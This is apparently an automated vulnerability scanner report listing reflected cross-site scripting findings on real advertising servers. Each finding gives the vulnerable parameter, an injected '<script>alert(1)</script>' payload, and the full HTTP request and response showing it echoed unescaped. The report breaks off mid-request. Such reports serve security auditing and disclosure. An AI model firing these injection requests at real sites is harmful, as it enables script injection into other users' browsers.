The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d73d0"><script>alert(1)</script>64a7d9f07a6 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073d73d0"><script>alert(1)</script>64a7d9f07a6&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=53894362007404304; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:28 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkAAAAAABwBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fm19rYKZg5%2FzAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:28 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073d73d0"><script>alert(1)</script>64a7d9f07a6&mt_id=126413&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=629767453?imid=7889652898655870963&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Cons
...[SNIP]...

2.2. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1131!

Issue detail

The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2738"><script>alert(1)</script>aaf70b1dcec was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060e2738"><script>alert(1)</script>aaf70b1dcec&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=53894362007404304; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:29 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkBAAAAACABArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8flXuAmg0WtthAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:29 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060e2738"><script>alert(1)</script>aaf70b1dcec&redirect=http://ad.agkn.com/interaction!che=1113815159?imid=6191889184259234657&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Produc
...[SNIP]...

2.3. http://ad.agkn.com/iframe!t=1131! [mt_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1131!

Issue detail

The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31576"><script>alert(1)</script>5388910874 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=12641331576"><script>alert(1)</script>5388910874&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=53894362007404304; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:28 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkAAAAAAB4BArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fiFkxme76tO0AAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:28 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=12641331576"><script>alert(1)</script>5388910874&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=1901865956?imid=2406266249759347636&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/
...[SNIP]...

2.4. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1131!

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f8a"%3balert(1)//dea654c72fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90f8a";alert(1)//dea654c72fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=&90f8a"%3balert(1)//dea654c72fb=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=141284751604938231; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:31 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkDAAAAAC4BArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjgZJgyzjKIaAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:31 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=&90f8a";alert(1)//dea654c72fb=1http://ad.agkn.com/interaction!che=883479704?imid=4042303976535532058&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Ser
...[SNIP]...

2.5. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1131!

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7755c"><script>alert(1)</script>9545d5276 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=&7755c"><script>alert(1)</script>9545d5276=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=141284751604938231; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:31 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkDAAAAACwBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjJIR95jMVMPAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:31 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=&7755c"><script>alert(1)</script>9545d5276=1http://ad.agkn.com/interaction!che=328625300?imid=3623224920692052751&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Ser
...[SNIP]...

2.6. http://ad.agkn.com/iframe!t=1131! [redirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.agkn.com
Path:	/iframe!t=1131!

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ab2"><script>alert(1)</script>6f8f881b193 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=b2ab2"><script>alert(1)</script>6f8f881b193 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=53894362007404304; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:29 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BjkBAAAAACIBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fkbIcRswpNtIAAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Fri, 06-Sep-2013 14:15:29 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect=b2ab2"><script>alert(1)</script>6f8f881b193http://ad.agkn.com/interaction!che=125802957?imid=5100450939591252808&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi
...[SNIP]...

2.7. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1487f"><script>alert(1)</script>98cccecfc5d was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1487f"><script>alert(1)</script>98cccecfc5d&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:22 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=7651996674825166060&rnd=3546163719540081147&fpid=1487f"><script>alert(1)</script>98cccecfc5d&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

2.8. http://ad.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd44d"><script>alert(1)</script>dc42d0b4e10 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6&sp=dd44d"><script>alert(1)</script>dc42d0b4e10 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:22 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=7651996674825166060&rnd=7846246777807154137&fpid=6&nu=n&t=&sp=dd44d"><script>alert(1)</script>dc42d0b4e10&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

2.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75549"><script>alert(1)</script>e68499ff4ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&site=334050&section_code=14494094&cb=1315404889357362&yrc=&ycg=&yyob=&yprop=au_news&ypos=N&75549"><script>alert(1)</script>e68499ff4ce=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=pR#?yN0FYbx1Nl=; ih="b!!!!3!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; 